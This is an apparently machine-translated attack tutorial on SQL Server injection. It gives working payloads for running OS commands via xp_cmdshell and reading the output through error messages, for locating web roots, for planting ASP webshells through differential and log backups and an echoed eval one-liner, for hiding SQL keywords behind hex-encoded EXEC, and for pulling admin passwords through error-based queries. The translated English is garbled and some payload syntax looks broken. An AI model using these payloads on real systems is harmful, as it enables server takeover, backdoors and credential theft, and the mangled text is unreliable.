In-depth analysis of SQL Server injection techniques

SQL Server Injection Tips

How do I get a faster result for a user executing a command for SA privileges?

There are display bits
No display bit
In fact, the key here is not there is no display bit. EXEC master.. xp_cmdshell ' SystemInfo ' produces a lot of rows when it is written into a table. And we have to do is how many lines through the display bit, or a one-time burst of error statements, the key here is the integration of multiple lines.

Method ①

BEGIN
IF EXISTS (select table_name from information_schema.tables where table_name= ' test_1 ') drop table test_1;
IF EXISTS (select table_name from information_schema.tables where table_name= ' test_2 ') drop table test_2;
Create TABLE test_1 ([Output][varchar] (1000));
Insert test_1 exec master.dbo.xp_cmdshell ' ipconfig/all ';
DECLARE @result varchar (8000)
SET @result = ' ~ '
SELECT @result = @result + ' +output from test_1 where output> ' '
SELECT @result as result into test_2;
Select CONVERT (int, select result from Test_2);
End;

Analytical:

Here 6-9 sentence means to affirm a @result of a temporary variable;
Set the initial value to ' ~ ', the data data in the test_1 is taken out sequentially, the iterative condition is output> ', and the group synthesizes the new string, and the string is separated by a space and finally copied to the @result;
Then set the @result to an alias and insert it into the test_2.
Last Error Echo
Ps:
MSSQL English Letter comparison size is case-insensitive
MSSQL string comparison size and C language str_cmp () the same truth
Method ② (injection point test Success, test Platform SQL server2008-10.0.1600.22 (X64)

Error: and (SELECT * from test_1 for XML PATH (")) =1--
Showing: UNION Select 1, (SELECT * from Test_1 for XML PATH ("))--

Second, how to quickly find the Site directory (sa user)

SA User is down right
SA user has not been dropped right
Here it is reasonable to distinguish between the right to fall and the right not to fall, if there is no right to fall. Then you can read some of the saved in the local configuration, if the permissions are low, you can use the dir command to find.

Method ① (Reduced right: – Pro-Test success):

CREATE TABLE test_1 ([Output][varchar] (1000));
INSERT test_1 EXEC master.dbo.xp_cmdshell ' dir/s d:\web.config ';
and (SELECT * from test_1 for XML PATH (")" = 1;

Method ② (without being demoted to the right –system– success):

CREATE TABLE test_1 ([Output][varchar] (1000));
INSERT test_1 EXEC master.dbo.xp_cmdshell ' cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM w3svc/1/root ';
and (SELECT * from test_1 for XML PATH (")" = 1;

Method ③ (Sa+system permission +iis7.0+iis7.5):

List of sites%systemroot%/system32/inetsrv/appcmd.exe list site--
%systemroot%\system32\inetsrv\appcmd.exe list vdir--List the physical path of the site

Ps:
%systemroot% Representative C:\windows\

Third, how to use the injection point Getshell

Method ① (differential backup) – Client-side Test success – no permissions are required and can be tested at non-SA permission injection points

IF EXISTS (select table_name from information_schema.tables where table_name= ' test_tmp ') drop table test_tmp;
Backup Database xfdata to disk = ' D:\WebRoot\asp.bak ';
CREATE TABLE [dbo]. [Test_tmp] ([cmd] [image]);
Insert into test_tmp (cmd) values (0x3c25657865637574652872657175657374282261222929253e);
Backup database Xfdata to disk= ' D:\WebRoot\asp.asp ' with Differential,format;

Method ② (Decrease volume) – Client-side Test success – no permissions are required and can be tested at non-SA permission injection points

IF EXISTS (select table_name from information_schema.tables where table_name= ' test_tmp ') drop table test_tmp;
ALTER DATABASE Xfdata set RECOVERY full;
CREATE TABLE test_tmp (a image);
Backup LOG xfdata to disk = ' D:\WebRoot\asp.bak ' with init;
INSERT into test_tmp (a) values (0x3c25657865637574652872657175657374282261222929253eda);
Backup LOG xfdata to disk = ' D:\webroot\123.asp '

Ps:
If you cannot back up, it is most likely an issue with access permissions. You can switch directory attempts
If the table exists, it will not succeed, so determine if the table exists and delete it if it exists.
Method ③ (Echo output one word trojan) –sa permission + Current user Write permission-Pro test success

echo ^<%eval request ("Pass")%^>>d:\%d1%a7%b7%d6%cf%b5%cd%b3\webroot\update.asp

Ps:
This is because of the injection point, so you need to pay attention to the coding problem. In general, the Code of the Web page and the encoding of the database are consistent (if not inconsistent ~ ~ I lose). Here I use a Chinese path to do the explanation.
Iv. How to avoid using keywords such as Select

Method ①: Hexadecimal obfuscation

;D eclare @S VARCHAR (4000) SET @s=cast (0x44524f50205441424c4520544d505f44423b as VARCHAR (4000)); EXEC (@S);--

V. How to get the back-end password as soon as the login point is injected

1 ' Having 1=1--#爆出表名

1 ' GROUP by username has 1=1--# burst field name

# User_mess.account

# USER_MESS.PWD

1 '; Select/**/convert (int, (select/**/top/**/1/**/account/**/from/**/user_mess))--
1 '; Select/**/convert (int, (select/**/top/**/1/**/pwd/**/from/**/user_mess/**/where/**/account= ' admin '))--

Six, the conclusion

This article was sorted out a long time ago, some places may have the wrong place, I hope you can point out